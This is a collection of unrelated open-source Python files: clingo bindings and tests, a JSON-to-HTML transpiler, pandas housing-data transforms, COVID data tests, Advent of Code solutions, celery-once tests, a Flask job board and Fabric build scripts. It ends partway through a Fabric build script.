mock_logger): """ main should log a GitCommandNotFound with "git is not installed!" when raised. """ self.mock_args.tracebacks = False self.mock_args.run.side_effect = GitCommandNotFound("git", "not installed!") try: main([]) except SystemExit: pass mock_logger.error.assert_called_once_with( "git is not installed!" ) def test_main_sets_verbosity(self): """ main should set verosity and level from args. """ main([]) mock_logger = self.mock_logging.getLogger.return_value mock_logger.setLevel.assert_any_call( self.mock_args.verbosity ) ```
{ "source": "joshessman-llnl/clingo", "score": 3 }
#### File: libpyclingo/clingo/core.py ```python from typing import Callable, Tuple from enum import Enum from ._internal import _cb_error_panic, _ffi, _lib, _to_str __all__ = [ 'Logger', 'MessageCode', 'TruthValue', 'version' ] def version() -> Tuple[int, int, int]: ''' Clingo's version as a tuple `(major, minor, revision)`. ''' p_major = _ffi.new('int*') p_minor = _ffi.new('int*') p_revision = _ffi.new('int*') _lib.clingo_version(p_major, p_minor, p_revision) return p_major[0], p_minor[0], p_revision[0] class MessageCode(Enum): ''' Enumeration of messages codes. ''' AtomUndefined = _lib.clingo_warning_atom_undefined ''' Informs about an undefined atom in program. ''' FileIncluded = _lib.clingo_warning_file_included ''' Indicates that the same file was included multiple times. ''' GlobalVariable = _lib.clingo_warning_global_variable ''' Informs about a global variable in a tuple of an aggregate element. ''' OperationUndefined = _lib.clingo_warning_operation_undefined ''' Inform about an undefined arithmetic operation or unsupported weight of an aggregate. ''' Other = _lib.clingo_warning_atom_undefined ''' Reports other kinds of messages. ''' RuntimeError = _lib.clingo_warning_runtime_error ''' To report multiple errors; a corresponding runtime error is raised later. ''' VariableUnbounded = _lib.clingo_warning_variable_unbounded ''' Informs about a CSP variable with an unbounded domain. ''' Logger = Callable[[MessageCode, str], None] @_ffi.def_extern(onerror=_cb_error_panic, name='pyclingo_logger_callback') def _pyclingo_logger_callback(code, message, data): ''' Low-level logger callback. ''' handler = _ffi.from_handle(data) handler(MessageCode(code), _to_str(message)) class TruthValue(Enum): ''' Enumeration of the different truth values. ''' False_ = _lib.clingo_external_type_false ''' Represents truth value true. ''' Free = _lib.clingo_external_type_free ''' Represents absence of a truth value. ''' True_ = _lib.clingo_external_type_true ''' Represents truth value true. ''' Release = _lib.clingo_external_type_release ''' Indicates that an atom is to be released. ''' ``` #### File: clingo/tests/test_conf.py ```python from unittest import TestCase from clingo import Configuration, Control class TestConfig(TestCase): ''' Tests for configuration and statistics. ''' def test_config(self): ''' Test configuration. ''' ctl = Control(['-t', '2']) self.assertIn('solver', ctl.configuration.keys) self.assertEqual(len(ctl.configuration.solver), 2) self.assertIsInstance(ctl.configuration.solver[0], Configuration) self.assertIsInstance(ctl.configuration.solver[0].heuristic, str) self.assertIsInstance(ctl.configuration.solver[0].description('heuristic'), str) ctl.configuration.solver[0].heuristic = 'berkmin' self.assertTrue(ctl.configuration.solver[0].heuristic.startswith('berkmin')) def test_simple_stats(self): ''' Test simple statistics. ''' ctl = Control(['-t', '2', '--stats=2']) ctl.add('base', [], '1 { a; b }.') ctl.ground([('base', [])]) ctl.solve() stats = ctl.statistics self.assertGreaterEqual(stats['problem']['lp']['atoms'], 2) self.assertGreaterEqual(stats['solving']['solvers']['choices'], 1) def test_user_stats(self): ''' Test user statistics. ''' def on_statistics(step, accu): step['test'] = {'a': 0, 'b': [1, 2], 'c': {'d': 3}} accu['test'] = step['test'] step['test'] = {'a': lambda a: a+1, 'e': lambda a: 4 if a is None else 0, 'b': [-1, 2, 3]} self.assertEqual(len(step['test']), 4) self.assertEqual(len(step['test']['b']), 3) self.assertEqual(len(step['test']['c']), 1) self.assertIn('a', step['test']) self.assertEqual(sorted(step['test']), ['a', 'b', 'c', 'e']) self.assertEqual(sorted(step['test'].keys()), ['a', 'b', 'c', 'e']) self.assertEqual(sorted(step['test']['c'].items()), [('d', 3.0)]) self.assertEqual(sorted(step['test']['c'].values()), [3.0]) step['test']['b'][1] = 99 self.assertEqual(step['test']['b'][1], 99) step['test']['b'].extend([3, 4]) step['test']['b'] += [3, 4] ctl = Control(['-t', '2', '--stats=2']) ctl.add('base', [], '1 { a; b }.') ctl.ground([('base', [])]) ctl.solve(on_statistics=on_statistics) stats = ctl.statistics self.assertEqual(stats['user_step']['test'], {'a': 1.0, 'b': [-1.0, 99.0, 3.0, 3.0, 4.0, 3.0, 4.0], 'c': {'d': 3.0}, 'e': 4.0}) self.assertEqual(stats['user_accu']['test'], {'a': 0, 'b': [1, 2], 'c': {'d': 3}}) ```
{ "source": "joshf26/JSML", "score": 3 }
#### File: JSML/src/inputparser.py ```python import json from sys import stdout from argparse import ArgumentParser, FileType def parse_input(default_output_filename='index.html'): argument_parser = ArgumentParser() argument_parser.add_argument( 'input', type=FileType('r'), help='specify the input json file name', ) argument_parser.add_argument( '-o', '--output', type=FileType('w'), help='specify the output html file name (default is "index.html")', ) argument_parser.add_argument( '-p', '--print', action='store_true', help='print to stdout and skip writing to file', ) args = argument_parser.parse_args() data = json.load(args.input) if args.print: output_file = stdout elif args.output is not None: output_file = args.output else: output_file = open(default_output_filename, 'w') return ( data, output_file, ) ``` #### File: JSML/src/main.py ```python from inputparser import parse_input from transpile import transpile def main(): data, output_file = parse_input() html = transpile(data) output_file.write(html) if __name__ == '__main__': main() ``` #### File: JSML/src/transpile.py ```python from xml.etree.ElementTree import Element, tostring, ElementTree DOCTYPE_HEADER = '<!DOCTYPE html>' class JSMLError(Exception): pass def get_path(root, element): parent_map = {child: parent for parent in ElementTree(root).iter() for child in parent} path = [root] current_element = element while current_element is not root: path.insert(1, current_element) current_element = parent_map[current_element] return path def _check_type(data, key, value_type, root, parent, tag=None): if key in data and not isinstance(data[key], value_type): if parent is None: raise JSMLError('Top level element\'s "{}" key must be a {} (not {}).'.format( key, value_type.__name__, type(data[key]).__name__, )) else: raise JSMLError('Element with path "{} -> {}"\'s "{}" key must be a {} (not {}).'.format( ' -> '.join(element.tag for element in get_path(root, parent)), tag if tag is not None else '?', key, value_type.__name__, type(data[key]).__name__, )) def transpile(data): root = None queue = [(data, None)] while queue: element_data, parent = queue.pop() if isinstance(element_data, dict): # Every element must have a "tag" key. if 'tag' not in element_data: if parent is None: raise JSMLError('Top level element is missing "tag" key.') else: raise JSMLError('Element with path "{} -> ?" is missing "tag" key.'.format( ' -> '.join(element.tag for element in get_path(root, parent)), )) # The "tag" key must be a string. _check_type(element_data, 'tag', str, root, parent) # The "attributes" key must be a dict. _check_type(element_data, 'attributes', dict, root, parent, element_data['tag']) # The "children" key must be a list. _check_type(element_data, 'children', list, root, parent, element_data['tag']) # Create the new element. element = Element( element_data['tag'], element_data['attributes'] if 'attributes' in element_data else {}, ) # Append the element to its parent. if parent is None: root = element else: parent.append(element) # Process the element's children. if 'children' in element_data: for child in element_data['children'][::-1]: queue.append((child, element)) elif isinstance(element_data, str): if parent is None: # Edge case where entire document is only a string value. return DOCTYPE_HEADER + element_data else: parent.text = element_data else: if parent is None: raise JSMLError('Top level element is of invalid data type {}.'.format( type(element_data).__name__, )) else: raise JSMLError('Element with path "{} -> ?" is of invalid data type {}.'.format( ' -> '.join(element.tag for element in get_path(root, parent)), type(element_data).__name__, )) return DOCTYPE_HEADER + tostring(root, encoding='unicode', method='html') ```
{ "source": "joshfgohunt/Capstone", "score": 3 }
#### File: joshfgohunt/Capstone/Transform_Data.py ```python import pandas as pd ########### Add State Info ################ def add_state_abbrev(df, left): us_state_abbrev = { 'Alabama': 'AL', 'Alaska': 'AK', 'Arizona': 'AZ', 'Arkansas': 'AR', 'California': 'CA', 'Colorado': 'CO', 'Connecticut': 'CT', 'Delaware': 'DE', 'Florida': 'FL', 'Georgia': 'GA', 'Hawaii': 'HI', 'Idaho': 'ID', 'Illinois': 'IL', 'Indiana': 'IN', 'Iowa': 'IA', 'Kansas': 'KS', 'Kentucky': 'KY', 'Louisiana': 'LA', 'Maine': 'ME', 'Maryland': 'MD', 'Massachusetts': 'MA', 'Michigan': 'MI', 'Minnesota': 'MN', 'Mississippi': 'MS', 'Missouri': 'MO', 'Montana': 'MT', 'Nebraska': 'NE', 'Nevada': 'NV', 'New Hampshire': 'NH', 'New Jersey': 'NJ', 'New Mexico': 'NM', 'New York': 'NY', 'North Carolina': 'NC', 'North Dakota': 'ND', 'Ohio': 'OH', 'Oklahoma': 'OK', 'Oregon': 'OR', 'Pennsylvania': 'PA', 'Rhode Island': 'RI', 'South Carolina': 'SC', 'South Dakota': 'SD', 'Tennessee': 'TN', 'Texas': 'TX', 'Utah': 'UT', 'Vermont': 'VT', 'Virginia': 'VA', 'Washington': 'WA', 'West Virginia': 'WV', 'Wisconsin': 'WI', 'Wyoming': 'WY', 'District of Columbia' : 'DC'} us_abbr = pd.DataFrame.from_dict(us_state_abbrev, orient='index') us_abbr = us_abbr.reset_index() us_abbr.columns = ['State', 'Abbr'] right = 'State' df = df.merge(us_abbr, how='inner', left_on=left, right_on=right) return df def add_state_region(df, left): state_region = {'Alabama': 'Southern', 'Alaska': 'Western', 'Arizona': 'Western', 'Arkansas': 'Southern', 'California': 'Western', 'Colorado': 'Western', 'Connecticut': 'Northeastern', 'Delaware': 'Southern', 'Florida': 'Southern', 'Georgia': 'Southern', 'Hawaii': 'Western', 'Idaho': 'Western', 'Illinois': 'Midwestern', 'Indiana': 'Midwestern', 'Iowa': 'Midwestern', 'Kansas': 'Midwestern', 'Kentucky': 'Southern', 'Louisiana': 'Southern', 'Maine': 'Northeastern', 'Maryland': 'Southern', 'Massachusetts': 'Northeastern', 'Michigan': 'Midwestern', 'Minnesota': 'Midwestern', 'Mississippi': 'Southern', 'Missouri': 'Midwestern', 'Montana': 'Western', 'Nebraska': 'Midwestern', 'Nevada': 'Western', 'New Hampshire': 'Northeastern', 'New Jersey': 'Northeastern', 'New Mexico': 'Western', 'New York': 'Northeastern', 'North Carolina': 'Southern', 'North Dakota': 'Midwestern', 'Ohio': 'Midwestern', 'Oklahoma': 'Southern', 'Oregon': 'Western', 'Pennsylvania': 'Northeastern', 'Rhode Island': 'Northeastern', 'South Carolina': 'Southern', 'South Dakota': 'Midwestern', 'Tennessee': 'Southern', 'Texas': 'Southern', 'Utah': 'Western', 'Vermont': 'Northeastern', 'Virginia': 'Southern', 'Washington': 'Western', 'West Virginia': 'Southern', 'Wisconsin': 'Midwestern', 'Wyoming': 'Western', 'District of Columbia' : 'Southern'} state_region = pd.DataFrame.from_dict(state_region, orient='index') state_region = state_region.reset_index() state_region.columns = ['State', 'Region'] right = 'State' df = df.merge(state_region, how='outer', left_on=left, right_on=right) return df ########### Consolidating Data ########## ### Location def consolidate_sell_pop(location_house_sell_time, location_state_pop): location_house_sell_time.columns = ['state', 'year', 'days_to_sell'] location_state_pop.columns = ['state', 'year', 'population'] merged_loc = location_house_sell_time.merge(location_state_pop, left_on= ['state', 'year'], right_on= ['state', 'year'], how='inner') return merged_loc def consolidate_sale_rent(location_rental_prices, location_house_prices): location_rental_prices.columns = ['state', 'size', 'year', 'rent_value'] location_house_prices.columns = ['state', 'size', 'year', 'sell_value'] housing_merged_loc = location_rental_prices.merge(location_house_prices, left_on= ['state', 'size', 'year'], right_on= ['state', 'size', 'year'], how='inner') return housing_merged_loc def group_state_degree_data(df): loc_field_focus = df.groupby(['State','Field'])['value'].sum().reset_index() loc_field_focus_totals = df.groupby(['State'])['value'].sum().reset_index() loc_field_focus_totals['Field'] = 'Total' state_ratio = loc_field_focus.append(loc_field_focus_totals) final =state_ratio.pivot_table(index = 'State', columns = 'Field', values = 'value') final = append_zscores(final, 'Total', 'Total_z') return final def group_age_degree_data(df): loc_age_focus = df.groupby(['Age Group','Field'])['value'].sum().reset_index() loc_age_totals = df.groupby(['Age Group'])['value'].sum().reset_index() loc_age_totals['Field'] = 'Total' age_ratio = loc_age_focus.append(loc_age_totals) final =age_ratio.pivot_table(index = 'Age Group', columns = 'Field', values = 'value') final = append_zscores(final, 'Total', 'Total_z') return final def get_rent_sale_growth(): location_rental_prices = pd.read_csv('Final_Data/ETL/zillow_rental_prices.csv') location_house_prices = pd.read_csv('Final_Data/ETL/zillow_house_prices.csv') housing_merged_loc = consolidate_sale_rent(location_rental_prices, location_house_prices) h_m_17 = housing_merged_loc[housing_merged_loc['year'] == 2017] h_m_20 = housing_merged_loc[housing_merged_loc['year'] == 2020] h_m_17 = h_m_17[['state','size','rent_value', 'sell_value']] h_m_20 = h_m_20[['state','size','rent_value', 'sell_value']] h_m_17_1 = h_m_17[h_m_17['size'] == '1br'] h_m_17_2 = h_m_17[h_m_17['size'] == '2br'] h_m_17_3 = h_m_17[h_m_17['size'] == '3br'] h_m_17_4 = h_m_17[h_m_17['size'] == '4br'] h_m_20_1 = h_m_20[h_m_20['size'] == '1br'] h_m_20_2 = h_m_20[h_m_20['size'] == '2br'] h_m_20_3 = h_m_20[h_m_20['size'] == '3br'] h_m_20_4 = h_m_20[h_m_20['size'] == '4br'] h_m_17_1 = h_m_17_1[['state', 'rent_value', 'sell_value']] h_m_17_2 = h_m_17_2[['state', 'rent_value', 'sell_value']] h_m_17_3 = h_m_17_3[['state', 'rent_value', 'sell_value']] h_m_17_4 = h_m_17_4[['state', 'rent_value', 'sell_value']] h_m_20_1 = h_m_20_1[['state', 'rent_value', 'sell_value']] h_m_20_2 = h_m_20_2[['state', 'rent_value', 'sell_value']] h_m_20_3 = h_m_20_3[['state', 'rent_value', 'sell_value']] h_m_20_4 = h_m_20_4[['state', 'rent_value', 'sell_value']] h_m_17_1.columns = ['state', 'rent_value_17_1', 'sell_value_17_1'] h_m_17_2.columns = ['state', 'rent_value_17_2', 'sell_value_17_2'] h_m_17_3.columns = ['state', 'rent_value_17_3', 'sell_value_17_3'] h_m_17_4.columns = ['state', 'rent_value_17_4', 'sell_value_17_4'] h_m_20_1.columns = ['state', 'rent_value_20_1', 'sell_value_20_1'] h_m_20_2.columns = ['state', 'rent_value_20_2', 'sell_value_20_2'] h_m_20_3.columns = ['state', 'rent_value_20_3', 'sell_value_20_3'] h_m_20_4.columns = ['state', 'rent_value_20_4', 'sell_value_20_4'] merged_rent_sale = h_m_17_1.merge(h_m_17_2, on='state', how='outer') merged_rent_sale = merged_rent_sale.merge(h_m_17_3, on='state', how='outer') merged_rent_sale = merged_rent_sale.merge(h_m_17_4, on='state', how='outer') merged_rent_sale = merged_rent_sale.merge(h_m_20_1, on='state', how='outer') merged_rent_sale = merged_rent_sale.merge(h_m_20_2, on='state', how='outer') merged_rent_sale = merged_rent_sale.merge(h_m_20_3, on='state', how='outer') merged_rent_sale = merged_rent_sale.merge(h_m_20_4, on='state', how='outer') return merged_rent_sale #### Degree def combine_demand(education_industry_counts, education_deg_to_job, education_deg_payback,location_state_sex_deg ): industry_demand = education_industry_counts.groupby('category')['Count'].sum().to_frame() degree_fill_count = education_deg_to_job.groupby('category')['count'].sum().to_frame() degree_mean = education_deg_payback.groupby('Category').mean() degrees_completed = location_state_sex_deg.groupby('Field')['value'].sum().to_frame() industry_demand = industry_demand.reset_index() industry_demand.columns = ['Field', 'Demand_Count'] degree_fill_count = degree_fill_count.reset_index() degree_fill_count.columns = ['Field', 'Degree_Fill_Count'] degree_mean = degree_mean.reset_index() degree_mean.columns = ['Field', 'start_salary', 'mid_salary'] degrees_completed = degrees_completed.reset_index() degrees_completed.columns = ['Field', 'bachelor_count'] dfs = industry_demand.merge(degree_fill_count, on='Field', how='inner') dfs = dfs.merge(degree_mean, on='Field', how='inner') dfs = dfs.merge(degrees_completed, on='Field', how='inner') return dfs def append_zscores(df, col, newcol): df[newcol] = (df[col] - df[col].mean())/df[col].std() return df #### Education def get_regional_salaries(reg_salaries): reg_salaries = reg_salaries.groupby('Region').mean() return reg_salaries def get_bachelor_ratios(bachelor_counts): bachelor_ratio = bachelor_counts.copy() bachelor_ratio['Arts, Humanities and Others'] = bachelor_ratio['Arts, Humanities and Others']/bachelor_ratio['Total'] bachelor_ratio['Business'] = bachelor_ratio['Business']/bachelor_ratio['Total'] bachelor_ratio['Education'] = bachelor_ratio['Education']/bachelor_ratio['Total'] bachelor_ratio['Sci_Eng_Related'] = bachelor_ratio['Sci_Eng_Related']/bachelor_ratio['Total'] bachelor_ratio['Science and Engineering'] = bachelor_ratio['Science and Engineering']/bachelor_ratio['Total'] return bachelor_ratio ```
{ "source": "joshfinney/COVID-19-Data-Hub", "score": 2 }
#### File: joshfinney/COVID-19-Data-Hub/test_covid_data_handler.py ```python from covid_data_handler import delete_update, hhmm_to_seconds, parse_csv_data, update_news, process_covid_csv_data, covid_API_request, schedule_covid_updates, get_updated, parse_json_data from random import randint import sched, time, logging def test_all(): test_get_updated() test_parse_csv_data() test_process_covid_csv_data() test_covid_API_request() test_parse_json_data() test_hhmm_to_seconds() test_schedule_covid_updates() test_update_news() test_delete_update() logging.info("COVID data handling test completed") def test_get_updated(): assert isinstance(get_updated(),bool) def test_parse_csv_data(): data = parse_csv_data('nation_2021-10-28.csv') assert len(data) == 639 def test_process_covid_csv_data(): last7days_cases , current_hospital_cases , total_deaths = process_covid_csv_data (parse_csv_data('nation_2021-10-28.csv')) assert str(last7days_cases) == "240299" assert str(current_hospital_cases) == "7019" assert str(total_deaths) == "141544" def test_covid_API_request(): data = covid_API_request(location='Exeter',location_type='ltla') assert isinstance(data, dict) def test_parse_json_data(): assert isinstance(parse_json_data(covid_API_request(location='Exeter',location_type='ltla'),0),dict) def test_hhmm_to_seconds(): test_time_input_1 = randint(0,23) test_time_input_2 = randint(0,59) test_time:str if test_time_input_1 < 10: test_time = "0" + str(test_time_input_1) + ":" else: test_time = str(test_time_input_1) + ":" if test_time_input_2 < 10: test_time = test_time + "0" + str(test_time_input_1) else: test_time = test_time + str(test_time_input_1) assert isinstance(hhmm_to_seconds(test_time), int) def test_schedule_covid_updates(): schedule_covid_updates(update_interval=10, update_name='update test',location='Exeter',location_type='ltla') def test_update_news(): update_news() def test_delete_update(): delete_update("Exeter COVID-19 data update") logging.basicConfig( filename='logging.log', level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s' ) test_scheduler = sched.scheduler(time.time,time.sleep) test_scheduler.enter(60*60,1,test_all) test_scheduler.run ```
{ "source": "joshfinnie/advent-of-code", "score": 3 }
#### File: 2020/day-01/part2.py ```python import sys def get_values(arr): sum = 2020 for i in arr: for j in arr: for z in arr: if i + j + z == sum: return i * j * z values = [] with open(sys.argv[1]) as inputfile: for lines in inputfile: values.append(int(lines)) print(get_values(values)) ``` #### File: 2020/day-03/part1.py ```python import sys def get_answer(arr): tree_count = 0 x_pos = 0 y_pos = 0 x_offset = 1 y_offset = 3 width = len(arr[0]) height = len(arr) while x_pos < height: test = arr[x_pos][y_pos] if test == "#": tree_count += 1 x_pos = x_pos + x_offset y_pos = (y_pos + y_offset) % width return tree_count with open(sys.argv[1]) as f: print(get_answer([l.strip() for l in f if l.strip()])) ``` #### File: 2020/day-05/part2.py ```python import sys def get_answers(arr): possible_seats = set(range(1024)) for a in arr: a = a.replace("F", "0").replace("B", "1") a = a.replace("R", "1").replace("L", "0") seat = int(a, 2) possible_seats.remove(seat) for seat in possible_seats: if seat - 1 not in possible_seats and seat + 1 not in possible_seats: return seat with open(sys.argv[1]) as f: arr = [l.strip() for l in f if l.strip()] print(get_answers(arr)) ```
{ "source": "joshfinnie/celery-once", "score": 2 }
#### File: tests/integration/test_integration.py ```python from celery import Celery from celery_once import QueueOnce, AlreadyQueued from freezegun import freeze_time import pytest app = Celery() app.conf.ONCE_REDIS_URL = 'redis://localhost:1337/0' app.conf.ONCE_DEFAULT_TIMEOUT = 30 * 60 app.conf.CELERY_ALWAYS_EAGER = True @app.task(name="example", base=QueueOnce, once={'keys': ['a']}) def example(redis, a=1): return redis.get("qo_example_a-1") def test_delay_1(redis): result = example.delay(redis) assert result.get() is not None redis.get("qo_example_a-1") is None def test_delay_2(redis): redis.set("qo_example_a-1", 10000000000) try: example.delay(redis) pytest.fail("Didn't raise AlreadyQueued.") except AlreadyQueued: pass @freeze_time("2012-01-14") # 1326499200 def test_delay_3(redis): redis.set("qo_example_a-1", 1326499200 - 60 * 60) example.delay(redis) def test_apply_async_1(redis): result = example.apply_async(args=(redis, )) assert result.get() is not None redis.get("qo_example_a-1") is None def test_apply_async_2(redis): redis.set("qo_example_a-1", 10000000000) try: example.apply_async(args=(redis, )) pytest.fail("Didn't raise AlreadyQueued.") except AlreadyQueued: pass def test_apply_async_3(redis): redis.set("qo_example_a-1", 10000000000) result = example.apply_async(args=(redis, ), once={'graceful': True}) assert result is None @freeze_time("2012-01-14") # 1326499200 def test_apply_async_4(redis): redis.set("qo_example_a-1", 1326499200 - 60 * 60) example.apply_async(args=(redis, )) def test_redis(): assert example.redis.connection_pool.connection_kwargs['host'] == "localhost" assert example.redis.connection_pool.connection_kwargs['port'] == 1337 assert example.redis.connection_pool.connection_kwargs['db'] == 0 def test_default_timeout(): assert example.default_timeout == 30 * 60 ``` #### File: tests/unit/test_task.py ```python from celery import task from celery_once.tasks import QueueOnce, AlreadyQueued from freezegun import freeze_time import pytest @task(name='simple_example', base=QueueOnce) def simple_example(): return "simple" @task(name='args_example', base=QueueOnce) def args_example(a, b): return a + b @task(name='select_args_example', base=QueueOnce, once={'keys': ['a']}) def select_args_example(a, b): return a + b def test_get_key_simple(): assert "qo_simple_example" == simple_example.get_key() def test_get_key_args_1(): assert "qo_args_example_a-1_b-2" == args_example.get_key(kwargs={'a':1, 'b': 2}) def test_get_key_args_2(): assert "qo_args_example_a-1_b-2" == args_example.get_key(args=(1, 2, )) def test_get_key_select_args_1(): assert "qo_select_args_example_a-1" == select_args_example.get_key(kwargs={'a':1, 'b': 2}) @freeze_time("2012-01-14") # 1326499200 def test_raise_or_lock(redis): assert redis.get("test") is None QueueOnce().raise_or_lock(key="test", expires=60) assert redis.get("test") is not None assert redis.ttl("test") == 60 @freeze_time("2012-01-14") # 1326499200 def test_raise_or_lock_locked(redis): # Set to expire in 30 seconds! redis.set("test", 1326499200 + 30) with pytest.raises(AlreadyQueued) as e: QueueOnce().raise_or_lock(key="test", expires=60) assert e.value.countdown == 30 assert e.value.message == "Expires in 30 seconds" @freeze_time("2012-01-14") # 1326499200 def test_raise_or_lock_locked_and_expired(redis): # Set to have expired 30 ago seconds! redis.set("test", 1326499200 - 30) QueueOnce().raise_or_lock(key="test", expires=60) assert redis.get("test") is not None assert redis.ttl("test") == 60 def test_clear_lock(redis): redis.set("test", 1326499200 + 30) QueueOnce().clear_lock("test") assert redis.get("test") is None ```
{ "source": "joshfinnie/Flask-Job-Board", "score": 2 }
#### File: Flask-Job-Board/flask-job-board/app.py ```python import os from datetime import datetime from urlparse import urlparse from flask import Flask, render_template, request, redirect, url_for, flash, session from flaskext.seasurf import SeaSurf from flaskext.bcrypt import Bcrypt from flaskext.gravatar import Gravatar from functools import wraps import settings from mongoengine import connect, Document, StringField, EmailField, DateTimeField, URLField app = Flask(__name__) app.config.from_object(settings) csrf = SeaSurf(app) bcrypt = Bcrypt(app) gravatar = Gravatar(app, size=160, default='mm') database = urlparse(os.environ.get('MONGOHQ_URL', 'mongodb://localhost/flask-job-board')) connect(database.path[1:], host=database.hostname, port=database.port, username=database.username, password=<PASSWORD>) class User(Document): username = StringField(required=True) email = EmailField(required=True) first_name = StringField(max_length=50) last_name = StringField(max_length=50) location = StringField() homepage = StringField() passhash = StringField() created = DateTimeField() meta = { 'ordering': ['-created'] } class Job(Document): company_name = StringField(required=True) company_location = StringField(required=True) company_url = URLField(required=True) job_title = StringField(required=True) job_posting = StringField(required=True) application_instructions = StringField(required=True) created = DateTimeField() meta = { 'ordering': ['-created'] } def login_required(f): @wraps(f) def decorated_function(*args, **kwargs): if session.get("logged_in"): return f(*args, **kwargs) else: flash(u'Login is required.', 'warning') return redirect(url_for('login', next=request.url)) return decorated_function @app.template_filter() def timesince(dt, default="just now"): """ Returns string representing "time since" e.g. 3 days ago, 5 hours ago etc. """ now = datetime.utcnow() diff = now - dt periods = ( (diff.days / 365, "year", "years"), (diff.days / 30, "month", "months"), (diff.days / 7, "week", "weeks"), (diff.days, "day", "days"), (diff.seconds / 3600, "hour", "hours"), (diff.seconds / 60, "minute", "minutes"), (diff.seconds, "second", "seconds"), ) for period, singular, plural in periods: if period: return "%d %s ago" % (period, singular if period == 1 else plural) return default @app.route("/") def home(): jobs = Job.objects.all() return render_template('home.html', jobs=jobs) @app.route('/about') def about(): return render_template('about.html') @app.route('/contact') def contact(): return render_template('contact.html') @app.route('/create', methods=['GET', 'POST']) @login_required def create_job(): if request.method == 'POST': job = Job(company_name=request.form['company_name']) job.company_location=request.form['company_location'] company_url=request.form['company_url'] if company_url[:4] == 'http': job.company_url=company_url else: job.company_url='http://'+company_url job.job_title=request.form['job_title'] job.job_posting=request.form['job_posting'] job.application_instructions=request.form['application_instructions'] job.created=datetime.utcnow() job.save() next_url = job.id flash(u'Job successfully created.', 'success') return redirect(url_for('show_job', job_id=next_url)) else: return render_template('create_job.html') @app.route('/signup', methods=['GET', 'POST']) def signin(): if request.method == 'POST': if request.form['password'] == request.form['password2']: user = User(username=request.form['username']) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location='None' user.passhash=<PASSWORD>.generate_password_hash(request.form['password']) user.homepage='None' user.created=datetime.utcnow() user.save() user_id=user.id session['username'] = user.username session['logged_in'] = True flash(u'Successfully created new user.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: flash(u'Passwords do not match.', 'error') return render_template('create_user.html') else: return render_template('create_user.html') @app.route('/login', methods=['GET', 'POST']) def login(): next = request.values.get('next', '') if request.method == 'POST': try: user = User.objects.get(username=request.form['username']) except User.DoesNotExist: flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: if not bcrypt.check_password_hash(user.passhash, request.form['password']): flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: session['username'] = user.username session['logged_in'] = True flash(u'You have been successfully logged in.', 'success') return redirect(next or url_for('home')) return render_template('login.html') @app.route('/logout') def logout(): session.pop('username', None) session.pop('logged_in', None) flash(u'You have been successfully logged out.', 'info') return redirect(url_for('home')) @app.route('/settings', methods=['GET', 'POST']) @login_required def settings(): if request.method == 'POST': user=User.objects.get(username=session.get('username')) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location=request.form['location'] user.homepage=request.form['homepage'] user.save() user_id=user.id flash(u'Profile was successfully updated.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: user=User.objects.get(username=session.get('username')) return render_template('settings.html', user=user) @app.route('/user/<user_id>') def show_user(user_id): user = User.objects.with_id(user_id) return render_template('show_user.html', user=user) @app.route('/job/<job_id>') def show_job(job_id): job = Job.objects.with_id(job_id) return render_template('show_job.html', job=job) @app.route('/users') def show_all_users(): users = User.objects.all() return render_template('show_all_users.html', users=users) @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 if __name__ == "__main__": port = int(os.environ.get("PORT", 5000)) app.debug = True app.run(host='0.0.0.0', port=port) ```
{ "source": "joshfinnie/p.jfin.us", "score": 2 }
#### File: joshfinnie/p.jfin.us/fabfile.py ```python from fabric.api import * import fabric.contrib.project as project import os import sys import SimpleHTTPServer import SocketServer def clean(): if os.path.isdir(DEPLOY_PATH): local('rm -rf {deploy_path}'.format(**env)) local('mkdir {deploy_path}'.format(**env)) def build(): local('pelican -s pelicanconf.py') def rebuild(): clean() build() def regenerate(): local('pelican -r -s pelicanconf.py') def serve(): os.chdir(env.deploy_path) PORT = 8000 class AddressReuseTCPServer(SocketServer.TCPServer): allow_reuse_address = True server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler) sys.stderr.write('Serving on port {0} ...\n'.format(PORT)) server.serve_forever() def reserve(): build() serve() def preview(): local('pelican -s publishconf.py') ```
{ "source": "joshfire/joshfire-framework", "score": 3 }
#### File: examples/rss4/fabfile.py ```python from fabric.api import * import os import sys sys.path.append("../../build") from joshfabric import * def export(): local("rm -rf export/") local("mkdir -p export/") for f in ["public", "src", "joshfire"]: local("cp -RL %s export/" % f) def phonegap(): "EXPORT: export app to phonegap" export() if not os.path.isdir("phonegap"): print "Your phonegap project must be in phonegap/ ; We'll replace the phonegap/www/ directory" sys.exit(1) local("rm -rf phonegap/www/* && mkdir -p phonegap/www/") local("cp -R export/* phonegap/www/") switchfile = """<html> <head> <style> html,body { background-color:black; } </style> </head> <body> <script> window.location = "public/index.ios.html"; </script> </body> </html> """ f = open("phonegap/www/index.html", "w") f.write(switchfile) f.close() ``` #### File: joshfire/joshfire-framework/fabfile.py ```python from fabric.api import * import fabric.colors import os import re import sys import datetime sys.path.append("build") from joshfabric import * try: import json except: import simplejson as json """ Bootstrap generation """ def bootstraps(): """ Builds bootstrap files for each adapter """ requirejs = open("lib/vendor/require.js").read() # requirejs_node = open("lib/vendor/require.node.js").read() namespace = open("lib/global.js").read() adapters = os.listdir("lib/adapters/") def listSources(adapterpath): sources = [] for (path, dirs, files) in os.walk("lib/adapters/%s/" % adapterpath): for f in files: if re.match('.*\.js$', f): sources += [os.path.join(path.replace("lib/adapters/%s/" % adapterpath, ""), f)[0:-3]] sources.remove("global") try: sources.remove("bootstrap") except: pass return sources for c in adapters: # skip useless directories if(re.match('\.DS_Store', c)): continue sources = {} namespace_adapter = open("lib/adapters/%s/global.js" % c).read() # todo replace by some jseval(). adapter_deps = re.search( "J(oshfire)?\.adapterDeps\s*\=\s*([^\;]+)\;", namespace_adapter) deps = [c] if adapter_deps: deps += json.loads(adapter_deps.group(2).replace("'", '"')) for d in deps: sources[d] = listSources(d) patched_namespace = namespace patched_namespace = patched_namespace.replace( "JOSHFIRE_REPLACEME_ADAPTER_MODULES", json.dumps(sources)) patched_namespace = patched_namespace.replace( "JOSHFIRE_REPLACEME_ADAPTER_ID", json.dumps(c)) bootstrap = 